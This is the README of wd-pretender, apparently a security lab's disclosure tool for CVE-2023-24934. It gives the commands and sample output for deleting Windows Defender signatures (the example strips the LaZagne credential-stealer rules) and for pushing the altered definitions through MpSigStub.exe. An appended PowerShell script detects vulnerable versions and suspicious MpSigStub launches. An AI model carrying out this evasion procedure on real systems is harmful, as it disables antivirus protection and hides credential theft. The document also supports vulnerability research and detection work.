wd-pretender
TL;DR
Compatible with Windows Defender platform version 4.18.2302.7 and earlier.
Description
wd-pretender is a powerful tool designed to simulate a Windows Defender update using the CVE-2023-24934 vulnerability. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
Features
- Bypass EDR Rules: Bypass certain Windows Defender security measures and remain undetected.
Installation
Windows with Python 3.10+ and the libraries listed in requirements.txt.
Usage
-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --
[+] Getting Signatures Location ...
usage: wd-pretender.py command [options]
Windows Defender Update
positional arguments:
{bypass,delete,friendly}
bypass bypass windows defender rules by threat name
delete delete file by modifying rules
friendly add hash to friendly files threat
optional arguments:
-h, --help show this help message and exit
-o OUTPUT output folder for the exported vdm files
-d DEFINITIONS_PATH set explicit definitions path
Bypass
-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --
[+] Getting Signatures Location ...
usage: wd-pretender.py command [options] bypass [-h] threat_name
positional arguments:
threat_name delete all threats matching <threat_name>
For example, to bypass the LaZagne rules so that LaZagne can run without being detected by Windows Defender:
python wd-pretender.py -o C:\BypassDefs bypass lazagne
Output:
python .\wd-pretender.py -o C:\Definitions bypass lazagne
-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --
[+] Getting Signatures Location ...
[+] Definitions Path: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5235DDA9-EDFD-456F-A39A-88CF98DA5B71}
[+] Loading mpasbase.vdm
[+] Loading mpasdlta.vdm
[+] Loading mpavbase.vdm
[+] Loading mpavdlta.vdm
[+] Enumerating Anti-Virus Definitions
[+] Threats Containing: lazagne
Deleting => b'\xd8!LaZagne'
Deleting => b'HackTool:Python/LaZagne'
Deleting => b'HackTool:Python/LaZagne.A!MTB'
Deleting => b'\xd8!LaZagne!ml'
Deleting => b'HackTool:Python/LaZagne.D!MTB'
Deleting => b'\xcc!Golazagne.A!MTB'
Deleting => b'HackTool:Python/LaZagne.B'
Deleting => b'\xd8!LaZagne!sms'
Deleting => b'\xcc!Lazagne.A!MTB'
Deleting => b'\xcc\xe1Lazagne'
[+] Enumerating Anti-Spyware Definitions
[+] Threats Containing: lazagne
[+] Exporting Definitions into: C:\Definitions
[+] mpasdlta.vdm: 1.391.491.0 => 1.391.492.0
[+] mpavdlta.vdm: 1.391.491.0 => 1.391.492.0
[+] Done!
The output lists the threat rules the tool deleted, in this case 10 threats removed from the Anti-Virus definitions (the Anti-Spyware definitions contained no match). The updated definitions are exported to the folder given with -o (C:\BypassDefs in the example command above).
Next, copy MpSigStub.exe into that export folder and run:
MpSigStub.exe /stub 1.1.18500.10 /payload <definition_new_version>
The export lines in wd-pretender's output give the new definition version to use for <definition_new_version> (1.391.492.0 in the run above).
To verify that the update was applied, check MpSigStub.log in the Temp folder of the user that ran the command. For instance, when the command is run with administrator privileges (not a requirement), the log is found under C:\Windows\Temp.
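From the defender's side, the two facts this README makes visible are the affected platform range and the manual MpSigStub.exe /payload invocation. The script below is an added example, not part of wd-pretender or SafeBreach's code; it assumes Windows 10/11 with the Defender PowerShell module and, for the event search, "Audit Process Creation" with command-line logging enabled (otherwise 4688 events carry no CommandLine field).

```powershell
# Added example (not part of wd-pretender): check whether the local platform
# version falls in the range the README lists as affected, and surface recent
# MpSigStub.exe launches that pass a /payload path, for an analyst to review.

$LastAffectedPlatform = [version]'4.18.2302.7'   # from the README's TL;DR

function Test-AffectedPlatform {
    param([Parameter(Mandatory)][string]$PlatformVersion)
    # Get-MpComputerStatus reports the platform version as AMProductVersion.
    return ([version]$PlatformVersion) -le $LastAffectedPlatform
}

function Get-SigStubPayloadPath {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Returns the /payload argument of an MpSigStub.exe command line, or $null
    # when the command line is not an MpSigStub /payload run. The README's
    # procedure points /payload at a user-chosen folder; where that folder is,
    # and who launched it, is what the analyst wants to see.
    if ($CommandLine -notmatch '(?i)mpsigstub\.exe.*\s/payload\s+(?<p>"[^"]+"|\S+)') { return $null }
    return $Matches['p'].Trim('"')
}

function Find-SigStubLaunches {
    param([int]$Hours = 24)
    # Security event 4688 = process creation; assumes command-line auditing is on.
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $x = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $x.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($data['NewProcessName'] -match '(?i)mpsigstub\.exe$') {
            $payload = Get-SigStubPayloadPath -CommandLine ([string]$data['CommandLine'])
            if ($payload) {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    User        = $data['SubjectUserName']
                    PayloadPath = $payload
                    CommandLine = $data['CommandLine']
                }
            }
        }
    }
}

$status = Get-MpComputerStatus
if (Test-AffectedPlatform -PlatformVersion $status.AMProductVersion) {
    Write-Warning "Platform $($status.AMProductVersion) is within the range the README lists as affected"
}
Find-SigStubLaunches -Hours 24 | Format-Table -AutoSize
```

A payload folder that is user-writable, or a launch by an interactive user rather than the update pipeline, is the entry to correlate with MpSigStub.log and the signature versions reported by Get-MpComputerStatus.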
License
wd-pretender is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.